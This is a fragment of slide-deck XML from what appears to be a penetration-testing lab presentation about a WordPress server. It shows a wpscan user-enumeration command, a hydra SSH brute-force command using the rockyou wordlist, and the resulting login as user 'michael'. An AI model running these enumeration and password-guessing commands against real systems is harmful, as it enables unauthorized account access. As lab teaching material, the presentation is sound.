        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32716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Oswald"/>
                <a:ea typeface="Oswald"/>
                <a:cs typeface="Oswald"/>
                <a:sym typeface="Oswald"/>
              </a:rPr>
              <a:t>Exploitation: Enumerating WordPress-Server Users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82" name="Google Shape;2382;p143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="22948164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83" name="Google Shape;2383;p143"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2295400"/>
            <a:ext cx="24377700" cy="1080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wpscan --url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http://192.168.1.110/wordpress/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--detection-mode aggressive -eu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wpscan exploit revealed the user names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steven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 and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michael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”, this information was critical for us as we decided to attempt a Brute Force Attack via the open SSH Port 22.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This was confirmed By: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Login Error Messages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via (Aggressive Detection).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84" name="Google Shape;238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688" y="4747675"/>
            <a:ext cx="16950175" cy="36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Exploitation: Weak User Password &amp; Brute Force Vulnerability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90" name="Google Shape;2390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91" name="Google Shape;2391;p144"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-32800" y="2295400"/>
            <a:ext cx="24377700" cy="1074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used hydra to brute force Michael`s password on the Apache Server (Port 22).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Command: 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hydra -l michael -P /usr/share/wordlist/rockyou.txt -s 22 192.168.1.110 ssh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Hydra cracked Michael`s password with ease !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○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Password: “</a:t>
            </a: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michael</a:t>
            </a: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”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Char char="●"/>
            </a:pP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With Michael`s password we were able to successfully login</a:t>
            </a:r>
            <a:b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the Target Machine with WordPress “Author” permissions.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92" name="Google Shape;239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150" y="4056275"/>
            <a:ext cx="16867800" cy="30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024" y="8326150"/>
            <a:ext cx="10007725" cy="43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